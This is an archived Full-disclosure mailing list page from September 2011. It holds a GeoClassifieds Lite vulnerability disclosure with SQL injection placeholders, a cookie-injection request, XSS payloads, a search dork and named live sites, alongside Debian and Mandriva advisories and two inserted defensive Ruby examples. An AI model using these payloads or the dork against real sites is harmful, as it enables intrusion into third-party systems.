2011-09-06 Thread Yassin Aboukir
-
[+] Title: GeoClassifieds Lite Multiple vulnerabilities
[+] Affected Version : v2.0.1 & V2.0.3.1 & V2.0.3.2 &V2.0.4
[+] Software Link: http://geodesicsolutions.com/
[+] Tested on: Windows 7 
[+] Date : 25/08/2011
[+] Dork : "inurl:/admin/ Classifieds and Auctions
Software by Geodesic Solutions"
[+] Category : Webapps
[+] Severity : High to Medium
[+] Author   : Yassin Aboukir <01Xp01|At|Gmail.com>
[+] Site : http://www.Yaboukir.Com
--

[+] About the Software: [ Purchased Price: $399 USD - $799 USD] Geo
Classifieds Premier gives you all the options of the Basic classifieds
software edition, plus additional flexibility and powerful
functionality. It allows you to create multiple user groups and
multiple pricing plans, and is built to suit the most complicated
E-Commerce needs.

[+] How That can be Exploited :

### V2.0.1 : Suffers from SQL injection and cross-site scripting (XSS)
vulnerabilities.

1- SQL Injection (High) :

http://Localhost/?a=19&c=id [SQL Attack]

2- Cookies Based SQL Injection (High) :

# Read More About The Attack :
http://www.Yaboukir.com/cookie-based-sql-injection/

The idea of the PoC is to intercept the HTTP request sent to the
vulnerable website using a web proxy (WebScarab, for example, or just the
Tamper Data Firefox add-on) and then modify the cookie variable
language_id.

GET  HTTP/1.1
Host: localhost.com
Connection: keep-alive
Cookie: language_id=1[SQL attack]

3- Cross Site Scripting (Medium) :

The same thing with the XSS vulnerability: all you have to do is modify
the HTTP request.

GET  HTTP/1.1
Host: localhost.com
Connection: keep-alive
Cookie: alert('Xssed-By-Yassin');

Demos:
http://classified4u.biz/
http://www.freeclassifieds.aapkakolkata.com/


### V2.0.3.1 & V2.0.3.2 & V2.0.4 : Suffer from Cross site scripting (Xss).

1- Cross Site Scripting (Medium) :

http://Localhost/index.php?a=19&c=alert('Xssed By
Yassin');
http://Localhost/?a=19&c="+onmouseover=alert('Xssed-By-Yassin')+

Demos:
http://www.tescal.com/ads/
http://www.216ads.com/



Re: [Full-disclosure] [SECURITY] [DSA 2300-2] nss security update

2011-09-06 Thread Valdis . Kletnieks
On Tue, 06 Sep 2011 19:29:56 +0300, Georgi Guninski said:
 
> you appear to not be CVE(R) compliant. where is the CVE(R) id?

https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=DigiNotar

Right there.  Hope that helps.

> i immediately request you get a CVE(R) id and repost this email!!!

https://cve.mitre.org/about/terminology.html

They also didn't issue a CVE to match the CERT advisory CA-2001-04, so I expect
the guys at Mitre to do the same this time, for the same reasons (namely, that
a procedural error or compromise of a CA, although a security problem, isn't in
the class of things that CVE is tracking).




Re: [Full-disclosure] [SECURITY] [DSA 2300-2] nss security update

2011-09-06 Thread Georgi Guninski
On Mon, Sep 05, 2011 at 10:15:22PM +0200, Thijs Kinkhorst wrote:
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
> 
> - -
> Debian Security Advisory DSA-2300-2   secur...@debian.org
> http://www.debian.org/security/   Thijs Kinkhorst
> September 5, 2011  http://www.debian.org/security/faq
> - -
> 
> Package: nss
> Vulnerability  : compromised certificate authority
> Problem type   : local(remote)
> Debian-specific: no
> CVE ID : not available
> 
> Several unauthorised SSL certificates have been found in the wild issued
> for the DigiNotar Certificate Authority, obtained through a security
> compromise with said company. Debian, like other software
> distributors, has as a precaution decided to disable the DigiNotar
> Root CA by default in the NSS crypto libraries.
> 
> As a result from further understanding of the incident, this update
> to DSA 2300 disables additional DigiNotar issuing certificates.
> 
> For the oldstable distribution (lenny), this problem has been fixed in
> version 3.12.3.1-0lenny6.
> 
> For the stable distribution (squeeze), this problem has been fixed in
> version 3.12.8-1+squeeze3.
> 
> For the unstable distribution (sid), this problem has been fixed in
> version 3.12.11-2.
> 
> We recommend that you upgrade your nss packages.
> 
> Further information about Debian Security Advisories, how to apply
> these updates to your system and frequently asked questions can be
> found at: http://www.debian.org/security/
> 
> Mailing list: debian-security-annou...@lists.debian.org


you appear to not be CVE(R) compliant. where is the CVE(R) id?

i immediately request you get a CVE(R) id and repost this email!!!

-- 
joro



[Full-disclosure] [SECURITY] [DSA 2301-1] rails security update

2011-09-06 Thread Luciano Bello
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-2301-1   secur...@debian.org
http://www.debian.org/security/ Luciano Bello
September 5, 2011  http://www.debian.org/security/faq
- -

Package: rails
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2011-2930 CVE-2011-2931 CVE-2011-3186 CVE-2009-4214

Several vulnerabilities have been discovered in Rails, the Ruby web
application framework. The Common Vulnerabilities and Exposures project
identifies the following problems:

CVE-2009-4214

A cross-site scripting (XSS) vulnerability had been found in the
strip_tags function. An attacker may inject non-printable characters
that certain browsers will then evaluate. This vulnerability only
affects the oldstable distribution (lenny).

CVE-2011-2930

A SQL injection vulnerability had been found in the quote_table_name
method that could allow malicious users to inject arbitrary SQL into a
query.

CVE-2011-2931

A cross-site scripting (XSS) vulnerability had been found in the
strip_tags helper. A parsing error can be exploited by an attacker,
who can confuse the parser and may inject HTML tags into the output
document.

CVE-2011-3186

A newline (CRLF) injection vulnerability had been found in
response.rb. This vulnerability allows an attacker to inject arbitrary
HTTP headers and conduct HTTP response splitting attacks via the
Content-Type header.

For the oldstable distribution (lenny), this problem has been fixed in
version 2.1.0-7+lenny1.

For the stable distribution (squeeze), this problem has been fixed in
version 2.3.5-1.2+squeeze1.

For the unstable distribution (sid), this problem has been fixed in
version 2.3.14.

We recommend that you upgrade your rails packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org

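The CRLF-injection class named under CVE-2011-3186, as an added example written for this digest rather than code from Rails' response.rb: the unchecked header builder beside a guarded one, exercised with a constructed Content-Type value that carries a harmless marker header. HEADER_NAME and the helper names are this example's own.

```ruby
# Added example for this digest, not code from Rails' response.rb: the
# header-construction pattern behind CRLF injection, beside a guarded form.
class HeaderInjectionError < StandardError; end

# Field-name token grammar (constructed here, after RFC 7230's tchar set).
HEADER_NAME = /\A[!\#\$%&'*+\-.^_`|~0-9A-Za-z]+\z/

# Vulnerable pattern: the value is written verbatim, so a value that
# carries "\r\n" ends the header line and whatever follows becomes a
# new header (or, after a blank line, the response body).
def unsafe_header_line(name, value)
  "#{name}: #{value}\r\n"
end

# Guarded pattern: reject a name that is not a token and a value holding
# CR, LF or NUL before anything is serialized.
def safe_header_line(name, value)
  raise HeaderInjectionError, "bad header name #{name.inspect}" unless name.match?(HEADER_NAME)
  raise HeaderInjectionError, "control character in #{name} value" if value.match?(/[\r\n\0]/)
  "#{name}: #{value}\r\n"
end

# Serialize a whole header hash with the guarded builder.
def safe_header_block(headers)
  headers.map { |name, value| safe_header_line(name, value.to_s) }.join
end

# Detection helper for tests or log review: how many CRLF-terminated lines
# one serialized header produced. Anything other than 1 means it split.
def header_line_count(serialized)
  serialized.split("\r\n", -1).length - 1
end

if __FILE__ == $PROGRAM_NAME
  # Constructed tainted value: a harmless marker header after the media type.
  tainted = "text/html\r\nX-Injected: yes"
  puts header_line_count(unsafe_header_line("Content-Type", tainted)) # 2
  begin
    safe_header_line("Content-Type", tainted)
  rescue HeaderInjectionError => e
    puts "rejected: #{e.message}"
  end
end
```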


[Full-disclosure] [SECURITY] [DSA 2300-2] nss security update

2011-09-06 Thread Thijs Kinkhorst

- -
Debian Security Advisory DSA-2300-2   secur...@debian.org
http://www.debian.org/security/   Thijs Kinkhorst
September 5, 2011  http://www.debian.org/security/faq
- -

Package: nss
Vulnerability  : compromised certificate authority
Problem type   : local(remote)
Debian-specific: no
CVE ID : not available

Several unauthorised SSL certificates have been found in the wild issued
for the DigiNotar Certificate Authority, obtained through a security
compromise with said company. Debian, like other software
distributors, has as a precaution decided to disable the DigiNotar
Root CA by default in the NSS crypto libraries.

As a result of further understanding of the incident, this update
to DSA 2300 disables additional DigiNotar issuing certificates.

For the oldstable distribution (lenny), this problem has been fixed in
version 3.12.3.1-0lenny6.

For the stable distribution (squeeze), this problem has been fixed in
version 3.12.8-1+squeeze3.

For the unstable distribution (sid), this problem has been fixed in
version 3.12.11-2.

We recommend that you upgrade your nss packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



[Full-disclosure] [SECURITY] [DSA 2298-2] apache2 regression fix

2011-09-06 Thread Stefan Fritsch

- -
Debian Security Advisory DSA-2298-2   secur...@debian.org
http://www.debian.org/security/ Stefan Fritsch
September 05, 2011 http://www.debian.org/security/faq
- -

Package: apache2
Vulnerability  : denial of service
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2010-1452 CVE-2011-3192
Debian Bug : 639825

The apache2 upgrade from DSA-2298-1 has caused a regression that
prevented some video players from seeking in video files served by
Apache HTTPD. This update fixes this bug.


The text of the original advisory is reproduced for reference:

Two issues have been found in the Apache HTTPD web server:

CVE-2011-3192

A vulnerability has been found in the way the multiple overlapping
ranges are handled by the Apache HTTPD server. This vulnerability
allows an attacker to cause Apache HTTPD to use an excessive amount of
memory, causing a denial of service.

CVE-2010-1452

A vulnerability has been found in mod_dav that allows an attacker to
cause a daemon crash, causing a denial of service. This issue only
affects the Debian 5.0 oldstable/lenny distribution.


The regression has been fixed in the following packages:

For the oldstable distribution (lenny), this problem has been fixed
in version 2.2.9-10+lenny11.

For the stable distribution (squeeze), this problem has been fixed in
version 2.2.16-6+squeeze3.

For the testing distribution (wheezy), this problem will be fixed in
version 2.2.20-1.

For the unstable distribution (sid), this problem has been fixed in
version 2.2.20-1.

We recommend that you upgrade your apache2 packages.

This update also contains updated apache2-mpm-itk packages which have
been recompiled against the updated apache2 packages. The new version
number for the oldstable distribution is 2.2.6-02-1+lenny6. In the
stable distribution, apache2-mpm-itk has the same version number as
apache2.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org

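The overlapping-range condition described under CVE-2011-3192, as an added example written for this digest and not Apache's own code: a small Range-header inspector of the kind a proxy or WAF rule could apply in front of a server awaiting the update. It parses byte-range specs, flags too many ranges or overlapping ones, and RANGE_LIMIT is a constructed threshold for this example.

```ruby
# Added example for this digest, not Apache code: a Range-header inspector of
# the kind a proxy or WAF rule could apply in front of an unpatched server.
# RANGE_LIMIT is a constructed threshold chosen for this example.
RANGE_LIMIT = 5

# Parse "bytes=a-b,c-,-n" into [first, last] byte pairs for a resource of
# content_length bytes. Returns nil when the header is malformed or uses
# a unit other than bytes, so callers can fall back to ignoring it.
def parse_byte_ranges(header, content_length)
  return nil unless header =~ /\Abytes=(.+)\z/
  last_byte = content_length - 1
  $1.split(",").map do |spec|
    case spec.strip
    when /\A(\d+)-(\d+)\z/ then [$1.to_i, [$2.to_i, last_byte].min]
    when /\A(\d+)-\z/      then [$1.to_i, last_byte]
    when /\A-(\d+)\z/      then [[content_length - $1.to_i, 0].max, last_byte]
    else return nil
    end
  end
end

# True when any two requested ranges share at least one byte.
def overlapping_ranges?(ranges)
  sorted = ranges.sort_by(&:first)
  sorted.each_cons(2).any? { |(_, end1), (start2, _)| start2 <= end1 }
end

# Policy decision for one request: :serve, :reject_too_many,
# :reject_overlap, or :ignore (treat as a plain full-body request).
def assess_range_header(header, content_length)
  ranges = parse_byte_ranges(header, content_length)
  return :ignore if ranges.nil? || ranges.empty?
  return :reject_too_many if ranges.length > RANGE_LIMIT
  return :reject_overlap if overlapping_ranges?(ranges)
  :serve
end

if __FILE__ == $PROGRAM_NAME
  # Constructed request headers: one benign, one shaped like the DoS pattern.
  puts assess_range_header("bytes=0-99", 1_000)                 # serve
  puts assess_range_header("bytes=0-,1-,2-,3-,4-,5-,6-", 1_000) # reject_too_many
end
```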


[Full-disclosure] Globaleaks demo of the Prototype online! $ /etc/init.d/globaleaks start

2011-09-06 Thread Arturo Filastò
Hi All,

We are pleased to announce the release of the GlobaLeaks Prototype Demo.

You are all invited to take a look at it and try how it feels to a Node
Administrator, Whistleblower and TULIP receiving target.

You can reach the demo on http://demo.globaleaks.org/

GlobaLeaks is the first Open Source Whistleblowing Framework.

It empowers anyone to easily set up and maintain their own Whistleblowing
platform. It is also a collection of what are the best practices for
people receiving and submitting material. GlobaLeaks works in all
environments: media, activism, corporations, public agencies.

For the full release notice you can visit http://www.globaleaks.org/news/

For all the links and information on the project http://www.globaleaks.org.

GlobaLeaks has been tested by more than 50 drunk Venetian hackers, here
is a link to the presentation given at the Italian Hacker camp ESC:
http://www.slideshare.net/globaleaks/globaleaks-live-launch-venice-2011.

And most importantly, please come and hack with us and let's change the
world! http://www.launchpad.net/globaleaks/

Happy hacking,

A Random GlobaLeaks Contributor



Re: [Full-disclosure] Cybsec Advisory 2011 0901 Windows Script Host DLL Hijacking

2011-09-06 Thread Georgi Guninski
On Mon, Sep 05, 2011 at 07:50:51PM +, Thor (Hammer of God) wrote:
> Excellent points - one slight addition, though:
> 
> >In fact, the Windows Script Host software is mostly used to write system 
> >maintenance scripts, 
> >so it's obvious its scripts can't be restricted or they'd be useless.
> 
> Scripts can certainly be restricted based on the account context they are 
> executed under.   There is actually plenty one can do with "normal user" 
> scripts, but as you've pointed out, many of the options admins require 
> scripts for need escalated privileges.   This is obviously by design, and it 
> helps to keep admins aware of best practices when choosing to deploy 
> solutions via scripting.  There are, of course, many many other ways one can 
> accomplish system maintenance in a more secure way such as WMI, PS (which can 
> require signed scripts) and of course GPO and/or any other number of 
> solutions.  
> 
> I thought it important to outline that since, in my experience with "real" 
> admins, WSH is actually *not* used mostly for system maintenance per se, but 
> for standard automation.   Using scripts to perform actual administrative 
> tasks/maintenance is just a bad idea to begin with.  
>

you mean "to perform actual administrative tasks/maintenance" 
``"real" admins'' just click with the mouse on the platform in this thread?

-- 
joro



[Full-disclosure] [ MDVSA-2011:132 ] pidgin

2011-09-06 Thread security

 ___

 Mandriva Linux Security Advisory MDVSA-2011:132
 http://www.mandriva.com/security/
 ___

 Package : pidgin
 Date: September 6, 2011
 Affected: 2009.0, 2010.1, Enterprise Server 5.0
 ___

 Problem Description:

 Multiple vulnerabilities have been identified and fixed in pidgin:
 
 It was found that the gdk-pixbuf GIF image loader routine
 gdk_pixbuf__gif_image_load() did not properly handle certain return
 values from its subroutines. A remote attacker could provide a
 specially-crafted GIF image, which, once opened in Pidgin, would lead
 gdk-pixbuf to return a partially initialized pixbuf structure. Using
 this structure, possibly containing a huge width and height, could
 lead to the application being terminated due to excessive memory use
 (CVE-2011-2485).
 
 Certain characters in the nicknames of IRC users can trigger a
 null pointer dereference in the IRC protocol plugin's handling of
 responses to WHO requests. This can cause a crash on some operating
 systems. Clients based on libpurple 2.8.0 through 2.9.0 are affected
 (CVE-2011-2943).
 
 Incorrect handling of HTTP 100 responses in the MSN protocol plugin
 can cause the application to attempt to access memory that it does
 not have access to. This only affects users who have turned on the
 HTTP connection method for their accounts (it's off by default). This
 might only be triggerable by a malicious server and not a malicious
 peer. We believe remote code execution is not possible (CVE-2011-3184).
 
 Packages for 2009.0 are provided as of the Extended Maintenance
 Program. Please visit this link to learn more:
 http://store.mandriva.com/product_info.php?cPath=149&products_id=490
 
 This update provides pidgin 2.10.0, which is not vulnerable to
 these issues.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2485
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2943
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3184
 http://pidgin.im/news/security/
 ___

 Updated Packages:
